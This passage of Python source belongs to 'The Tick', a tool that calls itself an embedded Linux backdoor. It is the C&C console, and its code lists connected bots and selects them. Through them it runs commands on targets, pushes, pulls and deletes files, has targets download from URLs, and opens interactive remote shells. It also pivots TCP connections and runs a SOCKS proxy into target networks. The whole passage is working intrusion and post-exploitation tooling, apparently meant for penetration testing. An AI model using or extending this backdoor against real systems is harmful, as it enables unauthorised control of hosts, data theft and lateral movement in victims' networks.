get_resp_no_data(self.sock)
@bot_action
def file_exec(self, command_line):
self.sock.sendall( build_command(CMD_FILE_EXEC, command_line) )
return get_resp_with_data(self.sock)
@bot_action
def file_chmod(self, remote_file, mode_flags = 0o777):
self.sock.sendall( build_command(CMD_FILE_CHMOD, pack("!H", mode_flags) + remote_file) )
get_resp_no_data(self.sock)
@bot_action
def http_download(self, url, remote_file):
self.sock.sendall( build_command(CMD_HTTP_DOWNLOAD, url, remote_file) )
get_resp_no_data(self.sock)
@bot_action
def dns_resolve(self, domain):
self.sock.sendall( build_command(CMD_DNS_RESOLVE, domain) )
response = get_resp_with_data(self.sock)
##print " ".join("%02x" % ord(x) for x in response) # XXX DEBUG
answer = []
while response:
family, = unpack("!B", response[0])
if family == AF_INET:
addr = response[1:5]
response = response[5:]
elif family == AF_INET6:
addr = response[1:17]
response = response[17:]
else:
raise AssertionError()
answer.append(inet_ntop(family, addr))
return answer
@bot_action
def tcp_pivot(self, address, port):
self.sock.sendall( build_command(CMD_TCP_PIVOT, build_pivot_struct(address, port)) )
get_resp_no_data(self.sock)
self.alive = False
return self.sock
##############################################################################
# Various background daemons for the console UI.
# Daemon for remote shells.
class RemoteShell(Thread):
def __init__(self, sock):
# Socket connected to a remote shell.
self.sock = sock
# Flag we'll use to tell the background thread to stop.
self.alive = True
# Call the parent class constructor.
super(RemoteShell, self).__init__()
# Set the thread as a daemon so way when the
# main thread dies, this thread will die too.
self.daemon = True
# This method is invoked in a background thread.
# It forwards everything coming from the remote shell to standard output.
def run(self):
try:
while self.alive:
buffer = self.sock.recv(1024)
if not buffer:
break
sys.stdout.write(buffer)
except:
pass
finally:
try:
self.sock.shutdown(2)
except Exception:
pass
try:
self.sock.close()
except Exception:
pass
# This method is invoked from the main thread.
# It forwards everying from standard input to the remote shell.
# It launches the background thread and kills it before returning.
# Control+C is caught within this function, which causes the
# remote shell to be stopped without killing the console.
def run_parent(self):
self.start()
try:
while self.alive:
buffer = sys.stdin.readline()
if not buffer:
break
self.sock.sendall(buffer)
except: # DO NOT change this bare except: line
pass # I don't care what PEP8 has to say :P
finally:
self.alive = False
try:
self.sock.shutdown(2)
except Exception:
pass
try:
self.sock.close()
except Exception:
pass
self.join()
# Pivoting daemon.
class TCPForward(Thread):
def __init__(self, src_sock, dst_sock):
# Keep the source and destination sockets.
# This class only forwards in one direction,
# so you have to instance it twice and swap
# the source and destination sockets.
self.src_sock = src_sock
self.dst_sock = dst_sock
# Flag we'll use to tell the background thread to stop.
self.alive = False
# Call the parent class constructor.
super(TCPForward, self).__init__()
# Set the thread as a daemon so way when the
# main thread dies, this thread will die too.
self.daemon = True
# This method is invoked in a background thread.
# It forwards everything from the source socket
# into the destination socket. If either socket
# dies the other is closed and the thread dies.
def run(self):
self.alive = True
try:
while self.alive:
buffer = self.src_sock.recv(65535)
if not buffer:
break
self.dst_sock.sendall(buffer)
except:
pass
finally:
self.kill()
# Forcefully kill the background thread.
# This one is easier than the others. :)
def kill(self):
if not self.alive:
return
self.alive = False
try:
self.src_sock.shutdown(2)
except Exception:
pass
try:
self.src_sock.close()
except Exception:
pass
try:
self.dst_sock.shutdown(2)
except Exception:
pass
try:
self.dst_sock.close()
except Exception:
pass
# SOCKS proxy daemon.
class SOCKSProxy(Thread):
def __init__(self, listener, uuid, bind_addr = "127.0.0.1", port = 1080, username = "", password = ""):
# The listener that requested to proxy through a bot.
self.listener = listener
# The UUID of the bot we'll use to route proxy requests.
self.uuid = uuid
# The address to bind to when listening for SOCKS requests.
# Normally 0.0.0.0 for a shared proxy, 127.0.0.1 for private.
self.bind_addr = bind_addr
# The port to listen to for incoming SOCKS proxy requests.
self.port = port
# Optional username and password for the SOCKS proxy.
self.username = username
self.password = password
if (username or password) and not (username and password):
raise ValueError("Must specify both username and password or neither")
# Flag we'll use to tell the background thread to stop.
self.alive = False
# Listening socket for incoming SOCKS proxy requests.
# Will be created and destroyed inside the run() method.
self.listen_sock = None
# This is where we'll keep all the TCP forwarders.
self.bouncers = []
# Call the parent class constructor.
super(SOCKSProxy, self).__init__()
# Set the thread as a daemon so way when the
# main thread dies, this thread will die too.
self.daemon = True
# This method is invoked in a background thread.
def run(self):
# It's aliiiiiiive! \o/
self.alive = True
try:
# Listen on the specified port.
self.listen_sock = socket()
self.listen_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.listen_sock.bind((self.bind_addr, self.port))
self.listen_sock.listen(5)
# Loop until they ask us to stop.
while self.alive:
# Accept incoming connections.
# TODO add a console notification here?
accept_sock = self.listen_sock.accept()[0]
# Serve each request one by one.
# This is a bit crappy because, in theory, someone could
# connect a socket here and just wait, blocking the whole
# thing. But I don't think we should worry about that.
# Normal requests won't block because we'll spawn a thread
# for each once the tunnel has been established.
# On error, destroy the socket.
try:
self.serve_socks_request(accept_sock)
except:
try:
accept_sock.shutdown(2)
except Exception:
pass
try:
accept_sock.close()
except Exception:
pass
if self.alive:
#print_exc() # XXX DEBUG
continue
raise
# Kill the proxy on error.
except Exception:
#if self.alive:
# print_exc() # XXX DEBUG
# try:
# self.kill()
# except Exception:
# print_exc() # XXX DEBUG
#else:
try:
self.kill()
except Exception:
pass
# Make sure to clean up on exit.
finally:
# Not alive anymore. :sadface:
self.alive = False
# Destroy the listening socket.
try:
self.listen_sock.shutdown(2)
except Exception:
pass
try:
self.listen_sock.close()
except Exception:
pass
# Process each SOCKS proxy request.
# This method runs in a background thread and may spawn more threads.
# Caller is assumed to destroy the socket after the call.
def serve_socks_request(self, sock):
# This blog post helped me a lot :)
# https://rushter.com/blog/python-socks-server/
# First header is the version and acceptable auth methods.
# We only support SOCKS 5 and will ignore the auth. :P
request = recvall(sock, 2)
if len(request) != 2:
return # fail silently
version, num_auth = unpack("!BB", request)
if version != 5:
return # prevents easy fingerprinting
#sock.sendall(pack("!BB", 5, 0xff))
#raise RuntimeError("Bad SOCKS client")
methods = recvall(sock, num_auth)
# If we have a username and password, ask for them.
# If we don't then just let them it. :)
# If the client insists on giving us a password
# anyway, just accept anything they send us.
# TODO perhaps notify the console when this happens?
if (self.username and self.password) or "\x00" not in methods:
sock.sendall(pack("!BB", 5, 2))
request = recvall(sock, 2)
if not request:
return # fail silently
version, ulen = unpack("!BB", request)
assert version == 1
uname = recvall(sock, ulen)
plen, = unpack("!B", recvall(sock, 1))
passwd = recvall(sock, ulen)
if self.username and self.password and (self.username != uname or self.password != passwd):
sock.sendall(pack("!BB", 5, 0xff))
# TODO perhaps notify the console when this happens?
#raise RuntimeError("SOCKS authentication failure, user: %r, pass: %r" % (uname, passwd))
return # fail silently
sock.sendall(pack("!BB", 1, 0))
else:
sock.sendall(pack("!BB", 5, 0))
# If all went well we should get a proxy request now.
# We only support CONNECT requests for IPv4.
request = recvall(sock, 4)
if not request:
return # fail silently
version, cmd, _, atyp = unpack("!BBBB", request)
if version != 5 or cmd != 1 or atyp not in (1, 3):
sock.sendall(pack("!BBBBIH", 5, 5, 0, atyp, 0, 0))
return
#raise RuntimeError("Unsupported SOCKS request")
if atyp == 1:
addr = inet_ntoa(recvall(sock, 4))
port, = unpack("!H", recvall(sock, 2))
elif atyp == 3:
name_len, = unpack("!B", recvall(sock, 1))
name = recvall(sock, name_len)
port, = unpack("!H", recvall(sock, 2))
else:
raise AssertionError("wtf")
# Try to get the bot now.
# If we can't find it, reject the connection attempt.
try:
bot = self.listener.bots[self.uuid]
except Exception:
sock.sendall(pack("!BBBBIH", 5, 5, 0, atyp, 0, 0))
raise
# Do a DNS resolution remotely if needed.
if atyp == 3:
try:
addr = None
for x in bot.dns_resolve(name):
try:
inet_aton(x)
addr = x
break
except error:
continue
if not addr:
raise RuntimeError("could not resolve %s to ipv4 address" % name)
except Exception:
sock.sendall(pack("!BBBBIH", 5, 5, 0, atyp, 0, 0))
raise
# Do a TCP pivot on the bot.
try:
bot_sock = bot.tcp_pivot(addr, port)
except Exception:
sock.sendall(pack("!BBBBIH", 5, 5, 0, atyp, 0, 0))
raise
try:
# Tell the client the connection was successful.
sock.sendall(pack("!BBBB", 5, 0, 0, 1) + inet_aton(addr) + pack("!H", port))
# Launch the TCP forwarders now.
bouncer_1 = TCPForward(sock, bot_sock)
bouncer_2 = TCPForward(bot_sock, sock)
bouncer_1.start()
bouncer_2.start()
self.bouncers.append(bouncer_1)
self.bouncers.append(bouncer_2)
# Clean up the pivoted connection on exception.
except Exception:
try:
bot_sock.shutdown(2)
except Exception:
pass
try:
bot_sock.close()
except Exception:
pass
raise
# Forcefully kill the background thread.
# The accept() call is a bit particular in Python,
# we can't just close the socket and call it a day.
# This resulted in stubborn listener threads who simply
# refused to die... extreme measures had to be taken. ;)
def kill(self):
# Trivial case.
if not self.alive:
return
# Set the flag to false so the thread
# knows we are asking it to quit.
self.alive = False
try:
# Connect briefly to the listnening port.
# This will "wake up" the thread stuck
# in the blocking socket accept() call.
s = socket()
try:
s.connect(("127.0.0.1", self.port))
finally:
s.close()
finally:
# Kill all the TCP forwarders too.
while self.bouncers:
bouncer = self.bouncers.pop()
try:
bouncer.kill()
except Exception:
print_exc() # XXX DEBUG
pass
##############################################################################
# The Tick console. This is the one that launches everything else.
# Based on the standard cmd module, but with various hacks inside.
# And with pretty colors! Colorrrrrrssssssssssssssssssss!
class Console(Cmd):
"Interactive text console to manage The Tick bots."
# Header for help page.
doc_header = 'Available commands (type help * or help <command>)'
def __init__(self, args = ()):
# This member will contain the currently selected bot.
self.current = None
# This is a set of previously seen bot UUIDs.
# We use this to avoid notifying the user for bot reconnections,
# since we only want to show new bots connecting to the C&C.
# Reconnections may happen sporadically and just clutter the screen.
self.known_bots = set()
# These are the currently running SOCKS proxies.
# Keys are port numbers, values are SOCKSProxy objects.
# See the do_proxy() method for more details.
self.proxies = {}
# The TCP port listener for bots will be here.
self.listener = None
# This is the list of queued notifications.
# Notifications come from a background thread and when possible
# they are shown in real time, but when not they are queued here.
self.notifications = []
# This flag is related to the notifications.
# We'll use it to know whether it's safe to print them directly
# or we should wait until a better time to do it. Specifically,
# we will only print notifications in real time if the main thread
# is blocked waiting for user input, and queue them in any other case.
self.inside_prompt = False
# All the supported command line switches go here.
parser = ArgumentParser(formatter_class=ColorHelpFormatter,
prog=Fore.GREEN+Style.BRIGHT+os.path.basename(sys.argv[0])+Style.RESET_ALL,
description="Embedded Linux Backdoor by Mario Vilas (NCC Group)")
parser.add_argument("--version", action="version",
version="The Tick, by Mario Vilas (NCC Group), version " + Fore.YELLOW + "0.1" + Style.RESET_ALL)
parser.add_argument("-b", "--bind", dest="bind_addr", default="0.0.0.0",
metavar=Fore.BLUE+Style.BRIGHT+"ADDRESS"+Style.RESET_ALL,
help="IP address to bind all the listeners to [default: "+Fore.YELLOW+"0.0.0.0"+Style.RESET_ALL+"]")
parser.add_argument("-p", "--port", type=int, default=5555,
metavar=Fore.BLUE+Style.BRIGHT+"PORT"+Style.RESET_ALL,
help="Port to bind the TCP listener to [default: "+Fore.YELLOW+"5555"+Style.RESET_ALL+"]")
parser.add_argument("--no-color", action="store_true", default=False,
help=("Disable the use of ANSI escape sequences (i.e. pretty "+
Fore.RED+"c"+Style.BRIGHT+"o"+Fore.YELLOW+"l"+Fore.GREEN+"o"+Fore.BLUE+"r"+Fore.MAGENTA+"s"+Style.RESET_ALL+
" and other niceties)"))
parser.add_argument("--pro", action="store_true", default=False,
help="Replace the 0ldsch00l bloody banner with a cleaner, more sober banner,"\
" one more suitable for a pentesting report from an infosec professional"\
" such as yourself. Yes, this is who you are now. Accept it.")
# Try to adjust the help text to the console size.
# On error just ignore it and go with the default.
try:
width = int(check_output('stty size 2>/dev/null', shell=True).split(' ')[1])
if width > 160: width = 140
elif width < 80: width = 80
os.environ["COLUMNS"] = str(width)
except Exception:
pass
# Parse the command line arguments.
self.args = parser.parse_args(args)
# Show either the fun or the boring banner.
self.use_boring_banner = self.args.pro
# Call the parent class constructor.
Cmd.__init__(self)
# Context manager to ensure proper cleanup.
# Launching the daemons is done here to ensure it's mandatory.
def __enter__(self):
# Fire up the TCP C&C listener.
self.listener = Listener(self.notify_new_bot, self.args.bind_addr, self.args.port)
self.listener.start()
# Comply with the context managers protocol.
return self
# Context manager to ensure proper cleanup.
# This will kill all the background daemons.
def __exit__(self, *args):
try:
for proxy in self.proxies.values():
try:
proxy.kill()
except Exception:
print_exc()
except Exception:
print_exc()
try:
self.listener.kill()
except Exception:
print_exc()
# This method is called by the listener whenever a new bot connects.
# It will show a message to the user right below the command prompt.
# Note that this method will be invoked from a background thread.
def notify_new_bot(self, listener, bot):
# Notifications for reconnecting bots are skipped because they're
# not very useful except for debugging.
if bot.uuid not in self.known_bots:
# Prepare the notification text.
index = listener.bots.keys().index(bot.uuid)
text = "Bot %d [%s] connected from %s" % (index, bot.uuid, bot.from_addr[0])
text = Fore.BLUE + Style.BRIGHT + text + Style.RESET_ALL
# If the main thread is blocked waiting at the prompt,
# do some ANSI escape codes magic to insert the notification text on screen.
# Note that we cannot use this trick if --no-color was specified.
# (I mean, we could, but what if the reason the colors were turned off
# was that the C&C was not being run in a console with a proper tty?)
if self.inside_prompt and ANSI_ENABLED:
buf_bkp = readline.get_line_buffer()
sys.stdout.write("\033[s\033[0G\033[2K" + text + "\n")
sys.stdout.write(self.prompt.replace("\x01", "").replace("\x02", "") + buf_bkp + "\033[u\033[1B")
readline.redisplay()
# If we are not blocked at the prompt, better not write now!
# We would be messing up the output of some command.
# We'll queue the notification instead to be shown later.
else:
self.notifications.append(text)
# Remember we've seen this bot so we don't notify again.
self.known_bots.add(bot.uuid)
# Hook the precmd event to know when we're out of the command prompt.
def precmd(self, line):
try:
# If the currently selected bot is not alive, deselect it automatically.
# This may happen for example if the bot dies after executing a command,
# the connection is dropped unexpectedly, or the command was one of those
# that reuse the C&C socket to do something else.
if self.current is not None and (not self.current.alive or self.is_bot_busy()):
self.current = None
# Set the flag to indicate we're NOT blocked at the prompt.
self.inside_prompt = False
# Catch all exceptions, show the traceback and continue.
except Exception:
print_exc()
# Don't forget to return this or we can't run commands!
return line
# Hook the precmd event to know when we're in the command prompt.
# This is also a good time to issue the queued notifications.
def postcmd(self, stop, line):
try:
# If the currently selected bot is not alive, deselect it automatically.
# This may happen for example if the bot dies after executing a command,
# the connection is dropped unexpectedly, or the command was one of those
# that reuse the C&C socket to do something else.
if self.current is not None and (not self.current.alive or self.is_bot_busy()):
self.current = None
# If we have queued notifications, show them now.
while self.notifications:
print self.notifications.pop(0)
# Set the flag to indicate we're blocked at the prompt.
self.inside_prompt = True
# Catch all exceptions, show the traceback and continue.
except Exception:
print_exc()
# Don't forget to return this or we can't quit!
return stop
# Hook the preloop event because otherwise we don't
# find out when the prompt is shown for the first time.
def preloop(self):
try:
# If the currently selected bot is not alive, deselect it automatically.
# This may happen for example if the bot dies after executing a command,
# the connection is dropped unexpectedly, or the command was one of those
# that reuse the C&C socket to do something else.
if self.current is not None and (not self.current.alive or self.is_bot_busy()):
self.current = None
# Set the flag to indicate we're blocked at the prompt.
self.inside_prompt = True
# Catch all exceptions, show the traceback and continue.
except Exception:
print_exc()
# Default behaviour for the base class is to repeat the last command if
# a blank line is given. This is quite dangerous so we're disabling it.
def emptyline(self):
return ""
# This property generates the banner.
@property
def intro(self):
# Prepare the dynamic part of the banner.
listening_on = ("Listening on: %s:%d" % (self.listener.bind_addr, self.listener.port))
# Boring banner :(
if self.use_boring_banner:
return (
BORING_BANNER +
" Embedded Linux Backdoor\nby Mario Vilas (NCC Group)\n\n" +
Fore.GREEN + listening_on + Style.RESET_ALL
)
# Fun banner :)
return (
FUN_BANNER +
Style.BRIGHT +
" Embedded Linux Backdoor\n" + Style.NORMAL +
" by Mario Vilas (NCC Group)\n\n" +
Fore.GREEN + listening_on + Style.RESET_ALL
)
# This property generates the command prompt.
@property
def prompt(self):
# If the currently selected bot is not alive, deselect it automatically.
# This may happen for example if the bot dies after executing a command,
# the connection is dropped unexpectedly, or the command was one of those
# that reuse the C&C socket to do something else.
if self.current is not None and (not self.current.alive or self.is_bot_busy()):
self.current = None
# If no bot is selected, show the corresponding prompt.
if self.current is None:
return "\x01" + Fore.RED + "\x02" + "[No bot selected] " + "\x01" + Style.RESET_ALL + "\x02"
# If a bot is selected, show its info in the prompt.
bot = self.current
index = self.listener.bots.keys().index(bot.uuid)
addr = bot.from_addr[0]
return "\x01" + Fore.GREEN + Style.BRIGHT + "\x02" + ("[Bot %d: %s] " % (index, addr)) + "\x01" + Style.RESET_ALL + "\x02"
# Helper function to tell if a bot is busy.
# If no bot is given, the currently selected bot is tested.
def is_bot_busy(self, bot = None):
if bot is None:
bot = self.current
if bot is None:
return False
uuid = bot.uuid
for x in self.proxies.values():
if x.uuid == uuid:
return True
return False
#
# The implementation for each command follows.
#
def do_help(self, line):
"""
\x1b[32m\x1b[1mhelp\x1b[0m
\x1b[32m\x1b[1mhelp\x1b[0m \x1b[34m\x1b[1m*\x1b[0m
\x1b[32m\x1b[1mhelp\x1b[0m <\x1b[34m\x1b[1mcommand\x1b[0m> [\x1b[34m\x1b[1mcommand\x1b[0m...]
Without arguments, shows the list of available commands.
With arguments, shows the help for one or more commands.
Use "\x1b[34m\x1b[1mhelp *\x1b[0m" to show help for all commands at once.
The question mark "\x1b[34m\x1b[1m?\x1b[0m" can be used as an alias for "\x1b[34m\x1b[1mhelp\x1b[0m".\n"""
if not line.strip():
Cmd.do_help(self, line)
else:
commands = split(line, comments=True)
if commands == ["*"]:
commands = self.get_names()
commands = [ x[3:] for x in commands if x.startswith("do_") ]
commands.sort()
last = len(commands) - 1
index = 0
for cmd in commands:
Cmd.do_help(self, cmd)
if index < last:
print Fore.RED + Style.BRIGHT + ("-" * 79) + Style.RESET_ALL
index += 1
def do_exit(self, line):
"""
\x1b[32m\x1b[1mexit\x1b[0m
Exit the command interpreter.
This command takes no arguments.\n"""
# Parse the arguments, on error show help.
if line.strip():
self.onecmd("help exit")
return
# Quit the command intepreter.
# The context manager will take care of cleaning up.
return True
def do_clear(self, line):
"""
\x1b[32m\x1b[1mclear\x1b[0m
Clear the screen.
This command takes no arguments.\n"""
# Parse the arguments, on error show help.
if line.strip():
self.onecmd("help clear")
return
# Clear the screen using the magic of ANSI escape codes.
# We need to make sure the escape codes are not being filtered out.
if not ANSI_ENABLED:
deinit()
init()
print "\033[2J\033[1;1f"
if not ANSI_ENABLED:
deinit()
init(wrap = True, strip = True)
def do_bots(self, line):
"""
\x1b[32m\x1b[1mbots\x1b[0m
List all currently connected bots.
This command takes no arguments.\n"""
# Parse the arguments, on error show help.
if line.strip():
self.onecmd("help bots")
return
# If we have no connected bots, just show an error message.
if not self.listener.bots:
print Fore.YELLOW + "No bots have connected yet" + Style.RESET_ALL
return
# We will show the list of bots in an ASCII art table.
# Because of course we will. ;)
# Note that we can't use ANSI escapes here because the
# size calculations for the table go wrong, so we do a
# dirty trick instead with placeholder characters.
table = Texttable()
table.set_deco(Texttable.HEADER)
table.set_cols_dtype(("i", "t", "t", "t"))
table.set_cols_align(("l", "c", "c", "c"))
table.set_cols_valign(("t", "t", "t", "t"))
table.set_cols_width((len(str(len(self.listener.bots))), 38, 17, 6))
table.add_rows((("#", "UUID", "IP address", "Status"),), header = True)
i = 0
for bot in self.listener.bots.values():
busy = self.is_bot_busy(bot)
status = "\x01gone\x04"
if bot.alive:
status = "\x03live\x04"
if busy:
status = "\x02busy\x04"
table.add_row((
i,
bot.uuid,
"\x02" + bot.from_addr[0] + "\x04",
status
))
i += 1
text = table.draw()
text = text.replace("\x01", " " + Fore.RED + Style.BRIGHT)
text = text.replace("\x02", " " + Fore.BLUE + Style.BRIGHT)
text = text.replace("\x03", " " + Fore.GREEN + Style.BRIGHT)
text = text.replace("\x04", Style.RESET_ALL + " ")
print
print text
print
def do_current(self, line):
"""
\x1b[32m\x1b[1mcurrent\x1b[0m
Shows the currently selected bot.
This command takes no arguments.\n"""
# Parse the arguments, on error show help.
if line.strip():
self.onecmd("help current")
return
# If no bot is selected, show a simple message.
if self.current is None:
print Fore.YELLOW + "No bot selected" + Style.RESET_ALL
return
# Show the details of the currently selected bot.
bot = self.current
addr = bot.from_addr[0]
uuid = bot.uuid
index = self.listener.bots.keys().index(uuid)
print (
"\n" +
"Bot number: #%d\n" +
"IP address: %s\n" +
"UUID: [" + Fore.BLUE + Style.BRIGHT + "%s" + Style.RESET_ALL + "]\n"
) % (index, addr, uuid)
def do_use(self, line):
"""
\x1b[32m\x1b[1muse\x1b[0m <\x1b[34m\x1b[1mIP address\x1b[0m>
\x1b[32m\x1b[1muse\x1b[0m <\x1b[34m\x1b[1mnumber\x1b[0m>
\x1b[32m\x1b[1muse\x1b[0m <\x1b[34m\x1b[1mUUID\x1b[0m>
\x1b[32m\x1b[1muse\x1b[0m
Select a bot to use. Try the "\x1b[32m\x1b[1mbots\x1b[0m" command to list the available bots.
When invoked with no arguments, the currently selected bot is deselected.\n"""
# When invoked with no arguments, deselect the current bot.
line = line.strip()
if not line:
self.current = None
else:
# Parse the arguments, on error show help.
try:
bot_id, = split(line, comments=True)
except Exception:
self.onecmd("help use")
return
# If a UUID was passed, we can fetch it directly from the dict.
try:
bot = self.listener.bots[bot_id]
except KeyError:
# If a number was passed, we can get it by index.
# That's why we used an OrderedDict in the listener.
try:
bot = self.listener.bots.values()[ int(bot_id) ]
except IndexError:
print Fore.YELLOW + ("Error: no bot number %d found" % int(bot_id)) + Style.RESET_ALL
return
except ValueError:
# Last change: was it an IP address?
# Fetch the first bot we can find from that IP.
# There may be more than one (think a LAN behind a NAT),
# but that's the user's problem, not ours...
try:
inet_aton(bot_id)
except error:
self.onecmd("help use") # wasn't an IP either :(
return
found = False
index = 0
for bot in self.listener.bots.values():
if bot.alive and bot_id == bot.from_addr[0]:
found = True
break
index = index + 1
if not found:
print Fore.YELLOW + ("Error: no bot connected to IP address %s" % bot_id) + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy(bot):
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# The bot must be alive.
if not bot.alive:
print Fore.YELLOW + "Bot is disconnected" + Style.RESET_ALL
return
# Select the bot.
self.current = bot
def do_pull(self, line):
"""
\x1b[32m\x1b[1mpull\x1b[0m <\x1b[34m\x1b[1mremote file\x1b[0m> <\x1b[34m\x1b[1mlocal file\x1b[0m>
Pull a file from the target machine.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
remote_file, local_file = split(line, comments=True)
except Exception:
self.onecmd("help pull")
return
# Perform the operation.
self.current.file_read(remote_file, local_file)
def do_push(self, line):
"""
\x1b[32m\x1b[1mpush\x1b[0m <\x1b[34m\x1b[1mlocal file\x1b[0m> <\x1b[34m\x1b[1mremote file\x1b[0m>
Push a file into the target machine.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
local_file, remote_file = split(line, comments=True)
except Exception:
self.onecmd("help push")
return
# Perform the operation.
self.current.file_write(local_file, remote_file)
def do_chmod(self, line):
"""
\x1b[32m\x1b[1mchmod\x1b[0m <\x1b[34m\x1b[1mremote file\x1b[0m>
Change a file's access mode flags.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
remote_file, mode_flags = split(line, comments=True)
except Exception:
self.onecmd("help chmod")
return
# Perform the operation.
self.current.file_chmod(remote_file, int(mode_flags, 8))
def do_rm(self, line):
"""
\x1b[32m\x1b[1mrm\x1b[0m <\x1b[34m\x1b[1mremote file\x1b[0m>
Delete a file.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
remote_file, = split(line, comments=True)
except Exception:
self.onecmd("help rm")
return
# Perform the operation.
self.current.file_delete(remote_file)
def do_exec(self, line):
"""
\x1b[32m\x1b[1mexec\x1b[0m <\x1b[34m\x1b[1mcommand line\x1b[0m>
Execute a non interactive command.
The output of the command is limited to 1024 bytes.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Perform the operation.
output = self.current.file_exec(line)
# If the output is exactly 1023 bytes long,
# that means it was likely truncated.
if len(output) == 1023:
output += "\n" + Fore.RED + Style.BRIGHT + "<output truncated>" + Style.RESET_ALL
# Print the output from the command to screen.
print output
def do_download(self, line):
"""
\x1b[32m\x1b[1mdownload\x1b[0m <\x1b[34m\x1b[1murl\x1b[0m> <\x1b[34m\x1b[1mremote file\x1b[0m>
Download a file via HTTP into the target machine.
Use the "\x1b[32m\x1b[1mpull\x1b[0m" command to retrieve the file locally afterwards.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
url, remote_file = split(line, comments=True)
except Exception:
self.onecmd("help download")
return
# Perform the operation.
self.current.http_download(url, remote_file)
def do_fork(self, line):
"""
\x1b[32m\x1b[1mfork\x1b[0m
Fork the bot instance.
This will create a new bot instance that will connect automatically.
The new instance will have a new UUID.
This command takes no arguments.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
assert not split(line, comments=True)
except Exception:
self.onecmd("help fork")
return
# Perform the operation.
self.current.system_fork()
def do_shell(self, line):
"""
\x1b[32m\x1b[1mshell\x1b[0m
Launch an interactive shell over the C&C connection.
This command takes no arguments.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
assert not split(line, comments=True)
except Exception:
self.onecmd("help shell")
return
# Remember the UUID of the bot. We will need this later.
uuid = self.current.uuid
# Launch an interactive shell on top of the interpreter.
# When the remote shell dies, return to the interpreter.
# When Control+C is hit, return to the interpreter.
sock = self.current.system_shell()
sleep(0.1) # wait for the reconnection
print Fore.YELLOW + "/-------------------------------------------------\\" + Style.RESET_ALL
print Fore.YELLOW + "| Entering remote shell. Use " + Style.BRIGHT + "Control+C" + Style.NORMAL + " to return. |" + Style.RESET_ALL
print Fore.YELLOW + "\\-------------------------------------------------/" + Style.RESET_ALL
shell = RemoteShell(sock)
shell.run_parent()
print
# Try to re-select the same bot when exiting the shell.
# We need to do this because the shell command reuses the C&C socket,
# so the bot mut reconnect in the background with a new socket.
self.current = self.listener.bots.get(uuid, None)
def do_dig(self, line):
"""
\x1b[32m\x1b[1mdig\x1b[0m <\x1b[34m\x1b[1mdomain name\x1b[0m>
Resolve a domain name at the bot.
This is useful for resolving local domains at the target network.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Parse the arguments, on error show help.
try:
domain, = split(line, comments=True)
assert domain
except Exception:
self.onecmd("help dig")
return
# Perform the operation.
answer = self.current.dns_resolve(domain)
# Show the results.
for addr in answer:
print addr
def do_pivot(self, line):
"""
\x1b[32m\x1b[1mpivot\x1b[0m <\x1b[34m\x1b[1mlisten on port\x1b[0m> <\x1b[34m\x1b[1mconnect to IP address\x1b[0m> <\x1b[34m\x1b[1mconnect to port\x1b[0m>
Create a one shot TCP tunnel. Useful for pivoting when launching exploits.
This tunnel will only be available to localhost and the port is closed
once a client has connected.\n"""
# A bot must be selected.
if self.current is None:
print Fore.YELLOW + "Error: no bot selected" + Style.RESET_ALL
return
# The bot must not be busy.
if self.is_bot_busy():
print Fore.YELLOW + "Bot is busy" + Style.RESET_ALL
return
# Make sure the bot is still alive.
# This is inaccurate and strictly speaking unneeded,
# but it helps a bit since we're about to launch
# multiple threads and all that stuff, and we may
# want to skip it for obviously wrong scenarios.
assert self.current.alive
# Parse the arguments, on error show help.
try:
listen, address, port = split(line, comments=True)
except Exception:
self.onecmd("help pivot")
return
# Remember the UUID of the bot. We will need this later.
uuid = self.current.uuid
# Listen on the requested port and wait for a single connection.
listen = int(listen)
port = int(port)
address = gethostbyname(address)
listen_sock = socket()
listen_sock.bind( ("127.0.0.1", listen) )
listen_sock.listen(1)
print "Connect to port %d now..." % listen
accept_sock = listen_sock.accept()[0]
try:
# We got our connection, so we can stop listening.
listen_sock.shutdown(2)
listen_sock.close()
# Connect to the target IP and port using the bot as a pivot.
# This reuses the current C&C socket so we won't be able to
# issue any more commands over it again. The bot will reconnect
# automatically in the background, however.
connect_sock = self.current.tcp_pivot(address, port)
try:
try:
# Fire up the TCP bouncers, one for each direction.
# That way we get a realtime duplex channel.
# Reading and writing sequentially would be a mistake,
# since we cannot be sure of the order in which that
# will happen, and we could deadlock.
